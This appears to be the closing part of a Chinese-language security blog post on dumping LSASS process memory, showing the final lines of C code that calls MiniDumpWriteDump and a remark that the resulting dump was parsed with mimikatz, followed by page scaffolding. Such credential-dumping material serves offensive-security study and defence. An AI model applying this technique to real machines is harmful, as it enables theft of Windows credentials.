		printf(<span style="color:#e6db74">&#34;MiniDumpWriteDump Failed: %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, GetLastError());
		Clean(processHandle, lsassHandle, lsassHandle);
		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;;
	}
	printf(<span style="color:#e6db74">&#34;sucess!&#34;</span>);

	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>;
}
</code></pre></div><p>编译后，尝试运行；运行成功dump出了lsass的内存，然后让<code>mimikatz</code>进行解析</p>
<p><img src="/images/Use%20fork%20dump%20lsass/image-20220219204912227.png" alt="image-20220219204912227"></p>

        </div>

        <div class="row middle-xs">
          <div class="col-xs-12">
            
          </div>
        </div>
        
          <div class="row">
            <div class="col-xs-12">
              
            </div>
          </div>

          



          
          
          <div style="height: 50px;"></div>
          
          <div class="post-comments">
            <div id="disqus_thread"></div>
<script>
  window.addEventListener("load", () => {
    (function() {
      
      var d = document,
        s = d.createElement("script");
      s.src = "https://joway.disqus.com/embed.js";
      s.setAttribute("data-timestamp", +new Date());
      (d.head || d.body).appendChild(s);
    })();
  });
</script>
<noscript
  >Please enable JavaScript to view the
  <a href="https://disqus.com/?ref_noscript"
    >comments powered by Disqus.</a
  ></noscript
>

          </div>
          
        

        <div class="site-footer">
  
  
</div>

      </div>
    </div>
  </article>

  

<script>
  
  
    
    
  
</script>

  

</body>

</html>